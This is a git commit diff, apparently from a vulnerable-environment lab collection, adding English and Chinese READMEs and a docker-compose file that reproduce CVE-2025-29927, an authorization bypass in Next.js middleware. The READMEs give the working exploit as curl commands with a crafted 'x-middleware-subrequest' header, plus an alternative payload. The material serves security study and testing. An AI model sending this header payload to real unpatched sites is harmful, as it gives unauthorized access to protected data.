first commit

2025-09-06 16:08:15 +08:00
commit 63285f61aa
2624 changed files with 88491 additions and 0 deletions
--- a/next.js/CVE-2025-29927/1.png
+++ b/next.js/CVE-2025-29927/1.png
--- a/next.js/CVE-2025-29927/2.png
+++ b/next.js/CVE-2025-29927/2.png
--- a/next.js/CVE-2025-29927/README.md
+++ b/next.js/CVE-2025-29927/README.md
@@ -0,0 +1,45 @@
+# Next.js Middleware Authorization Bypass (CVE-2025-29927)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+Next.js is a popular React-based web application framework providing features such as server-side rendering, static site generation, and an integrated routing system. When configured to use middleware for authentication and authorization purposes, versions prior to 14.2.25 and 15.2.3 are vulnerable to an authorization bypass.
+
+The vulnerability allows attackers to bypass middleware-based security controls by manipulating the `x-middleware-subrequest` header, potentially gaining unauthorized access to protected resources and sensitive data.
+
+References:
+
+- <https://github.com/advisories/GHSA-f82v-jwr5-mffw>
+- <https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware>
+- <https://nvd.nist.gov/vuln/detail/CVE-2025-29927>
+
+## Environment Setup
+
+Execute the following command to start a vulnerable application based on Next.js 15.2.2:
+
+```
+docker compose up -d
+```
+
+After the application starts, visit `http://your-ip:3000` you will be redirected to the login page. Input the default credentials `admin:password` to login and access the dashboard.
+
+## Vulnerability Reproduction
+
+If you try to access the dashboard directly without legal credentials, you will be redirected to the login page:
+
+```
+curl -i http://your-ip:3000
+```
+
+![](1.png)
+
+To exploit the vulnerability, you can add the `x-middleware-subrequest` header with the value `middleware:middleware:middleware:middleware:middleware` in the request. The Next.js middleware will incorrectly process this header and bypass the authentication checks:
+
+```
+curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://your-ip:3000
+```
+
+![](2.png)
+
+As you can see, the dashboard is accessible without any authentication.
+
+> You can also try the header `x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware` if the previous payload doesn't work.
--- a/next.js/CVE-2025-29927/README.zh-cn.md
+++ b/next.js/CVE-2025-29927/README.zh-cn.md
@@ -0,0 +1,43 @@
+# Next.js 中间件鉴权绕过漏洞 (CVE-2025-29927)
+
+Next.js 是一个基于 React 的流行 Web 应用框架，提供服务器端渲染、静态网站生成和集成路由系统等功能。当使用中间件进行身份验证和授权时，Next.js 14.2.25 和 15.2.3 之前的版本存在授权绕过漏洞。
+
+该漏洞允许攻击者通过操作 `x-middleware-subrequest` 请求头来绕过基于中间件的安全控制，从而可能获得对受保护资源和敏感数据的未授权访问。
+
+参考链接：
+
+- <https://github.com/advisories/GHSA-f82v-jwr5-mffw>
+- <https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware>
+- <https://nvd.nist.gov/vuln/detail/CVE-2025-29927>
+
+## 环境搭建
+
+执行以下命令启动一个基于 Next.js 15.2.2 的存在漏洞的应用：
+
+```
+docker compose up -d
+```
+
+应用启动后，访问 `http://your-ip:3000` 会被重定向到登录页面。输入默认凭据 `admin:password`，你可以登录成功并访问仪表盘。
+
+## 漏洞复现
+
+如果你尝试在没有合法凭据的情况下直接访问仪表盘，将会被重定向到登录页面：
+
+```
+curl -i http://your-ip:3000
+```
+
+![](1.png)
+
+要利用此漏洞，你可以在请求中添加 `x-middleware-subrequest` 请求头，其值为`middleware:middleware:middleware:middleware:middleware`。Next.js 中间件会错误地处理此请求头并绕过身份验证检查：
+
+```
+curl -i -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://your-ip:3000
+```
+
+![](2.png)
+
+可见，没有传入任何身份认证信息即可成功访问到仪表盘。
+
+> 如果上述 payload 不起作用，您也可以尝试使用请求头 `x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware`。
--- a/next.js/CVE-2025-29927/docker-compose.yml
+++ b/next.js/CVE-2025-29927/docker-compose.yml
@@ -0,0 +1,7 @@
+services:
+  web:
+    image: vulhub/nextjs:15.2.2
+    ports:
+      - "3000:3000"
+    environment:
+      - NODE_ENV=production